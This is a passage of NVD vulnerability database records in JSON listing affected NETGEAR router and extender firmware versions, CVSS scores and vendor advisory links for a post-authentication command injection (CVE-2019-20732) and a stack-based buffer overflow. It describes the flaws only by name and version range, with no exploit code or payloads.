"matchCriteriaId": "08FF0010-66E3-485C-A22B-39E57E738550",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5352DD0A-3388-423C-B6E3-38FFF8B4700F",
"versionEndExcluding": "1.0.9.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0CB1E644-FB4B-443B-B9D7-349F0024FB74",
"versionEndExcluding": "1.3.0.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EFFC911D-B2A3-47D7-940A-76978458CEA5",
"versionEndExcluding": "1.3.0.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB388895-B579-43B7-A88E-4BD28D41F6E2",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "999A4F9A-D803-47D0-94F5-4626669D8DE0",
"versionEndExcluding": "1.0.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E0C9AB4A-497B-4D5C-93E3-430C3361E24F",
"versionEndExcluding": "1.0.2.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72C46066-B210-44BB-9219-14B2E8CCEF8E",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B19B770D-4660-4B12-8B5C-B689DA8CCB64",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2DDFF20-B761-4E45-9F16-CE15C82AAB5C",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE9CF95-192E-4D43-9DAD-2C8D9AF045E9",
"versionEndExcluding": "1.0.2.106",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4DFD7557-D13D-40EB-94AD-AF092CDE587A",
"versionEndExcluding": "1.0.2.106",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0675F6C4-EB61-4DA3-8473-448E93D5E0A5",
"versionEndExcluding": "1.0.1.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38BC0F78-4571-45E6-9023-CD1AEA7DF8EF",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "263DFC40-2EED-49F3-AAA5-0F5D7EAC2DF3",
"versionEndExcluding": "1.2.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D6220 before 1.0.0.40, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGND2200Bv4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.20, R6300v2 before 1.0.4.24, R6400 before 1.0.1.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.106, R8500 before 1.0.2.106, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.18, and WNR3500Lv2 before 1.2.0.48."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una inyecci\u00f3n de comandos por parte de un usuario autenticado. Esto afecta a D6220 versiones anteriores a 1.0.0.40, D7000v2 versiones anteriores a 1.0.0.74, D8500 versiones anteriores a 1.0.3.39, DGN2200v4 versiones anteriores a 1.0.0.102, DGND2200Bv4 versiones anteriores a 1.0.0.102, EX3700 versiones anteriores a 1.0.0.70, EX3800 versiones anteriores a 1.0.0.70, EX6000 versiones anteriores a 1.0.0. 30, EX6100 versiones anteriores a 1.0.2.22, EX6120 versiones anteriores a 1.0.0.40, EX6130 versiones anteriores a 1.0.0.22, EX6150v1 versiones anteriores a 1.0.0.42, EX6200 versiones anteriores a 1.0.3.88, EX7000 versiones anteriores a 1.0.0.66, R6250 versiones anteriores a 1.0.4.20, R6300v2 versiones anteriores a 1.0.4.24, R6400 versiones anteriores a 1.0. 1.32, R6400v2 versiones anteriores a 1.0.2.44, R6700 versiones anteriores a 1.0.1.46, R6900 versiones anteriores a 1.0.1.46, R7000 versiones anteriores a 1.0.9.26, R6900P versiones anteriores a 1.3.0.20, R7000P versiones anteriores a 1.3.0.20, R7100LG versiones anteriores a 1.0.0.40, R7300DST versiones anteriores a 1.0.0.62, R7900 versiones anteriores a 1. 0.2.10, R8000 versiones anteriores a 1.0.4.12, R7900P versiones anteriores a 1.3.0.10, R8000P versiones anteriores a 1.3.0.10, R8300 versiones anteriores a 1.0.2.106, R8500 versiones anteriores a 1.0.2.106, WN2500RPv2 versiones anteriores a 1.0.1.54, WNDR3400v3 versiones anteriores a 1.0.1.18, y WNR3500Lv2 versiones anteriores a 1.2.0.48."
}
],
"id": "CVE-2019-20732",
"lastModified": "2024-11-21T04:39:12.800",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L",
"version": "3.0"
},
"exploitabilityScore": 0.8,
"impactScore": 4.7,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-16T20:15:13.447",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061195/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2228"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061195/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2228"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-77"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-16 19:15
Modified
2024-11-21 04:39
Severity ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.110, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R8300 before 1.0.2.122, R8500 before 1.0.2.122, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900P before 1.3.0.10, R8000P before 1.3.0.10, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "114EDC62-9DAE-45D9-8A90-A533BBBF50EB",
"versionEndExcluding": "1.0.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7AD596B6-3D11-456F-8BD0-2E7153BA5F53",
"versionEndExcluding": "1.0.0.78",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52FB0300-0FC9-4797-BACB-84D7D932A386",
"versionEndExcluding": "1.0.0.51",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "629E89E8-F329-4D11-9652-540752084DD3",
"versionEndExcluding": "1.0.3.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "91EFE482-AAF5-4B46-9658-94B1072F3CD2",
"versionEndExcluding": "1.0.0.110",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgnd2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C6BA1429-E44F-4E29-8D5E-6EEAC17962E7",
"versionEndExcluding": "1.0.0.110",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgnd2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "D6EBFFCE-0D9E-4383-8CD6-3DC4D2412446",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54C9BF9A-F891-4337-AAFF-6E192A81B45B",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "74109B25-B64E-4166-A7B0-E3DA87B89161",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7147AB6A-80B2-4468-BF13-5B7554AA5DA3",
"versionEndExcluding": "1.0.0.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "02E7CA7E-E6CA-4BAB-8F40-4731EA523D91",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "094113E0-3656-4E2A-B9EF-D397296BD07C",
"versionEndExcluding": "1.0.2.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AB84CD03-765C-4D4F-A176-364F8E72A4E7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "12C1BB59-1A89-45B9-A1D2-6D8DFEEC2F16",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09C02A78-A382-43A0-A20F-D6521F6DD57F",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D74896A7-7EF2-41C9-8A29-59B2EA5ABA5C",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "2CB9BD19-E748-41B9-8873-316FEB83F13D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A81A7574-A2C7-4216-98C6-6790FA705013",
"versionEndExcluding": "1.0.3.88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2F1E93FB-4926-4AF5-BA5F-A4DE4314B45F",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D1A9B6F-89B2-4785-A0E2-3FD322D6A28F",
"versionEndExcluding": "1.0.4.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "502055F1-F919-4C91-A3D0-B144027BC690",
"versionEndExcluding": "1.0.4.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB86B739-440E-4269-92EC-F7F3058E4406",
"versionEndExcluding": "1.0.1.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4EAD37-164F-4631-8DED-AB9BD41D2429",
"versionEndExcluding": "1.0.2.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4E821B01-31C8-4766-BAAF-D814336617B9",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "08FF0010-66E3-485C-A22B-39E57E738550",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "577AD463-2E99-4D07-BF12-1D40AC88B3FC",
"versionEndExcluding": "1.0.9.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E0C9AB4A-497B-4D5C-93E3-430C3361E24F",
"versionEndExcluding": "1.0.2.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72C46066-B210-44BB-9219-14B2E8CCEF8E",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
